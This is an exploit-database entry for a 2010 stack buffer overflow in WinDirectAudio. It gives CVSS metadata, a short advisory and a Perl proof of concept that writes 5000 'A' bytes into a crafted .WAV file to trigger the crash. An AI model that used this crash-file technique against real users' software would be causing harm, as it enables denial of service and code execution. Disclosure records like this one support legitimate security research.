header-logo
Suggest Exploit
vendor:
WinDirectAudio
by:
ahwak2000
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: WinDirectAudio
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 & SP3 EN
2010

WinDirectAudio (.WAV) PoC

WinDirectAudio is vulnerable to a buffer overflow vulnerability when a specially crafted .WAV file is opened. This can be exploited to cause a stack-based buffer overflow via an overly long string. This may allow an attacker to execute arbitrary code.

Mitigation:

Ensure that all system and software is kept up to date with the latest patches and security updates.
Source

Exploit-DB raw data:

#/usr/bin/perl
#Title: WinDirectAudio  (.WAV) PoC
#[+]Date       : May 21,  2010 
#[+]version    : v1.0
#[+]Author     : ahwak2000
#[+]Contact    : z.u5[at]hotmail.com
#[+]Geetz [2]  : germaya_x
#[+]tested on  : windows xp sp2&sp3 EN
#########################################
my $junk = "\x41" x 5000;
open(myfile,'>> ahwak2000.wav');
print myfile $junk."\r\n";
print "\nEvil WAV file created successfully.";

Navigation

Suggest Exploit

Services By CQR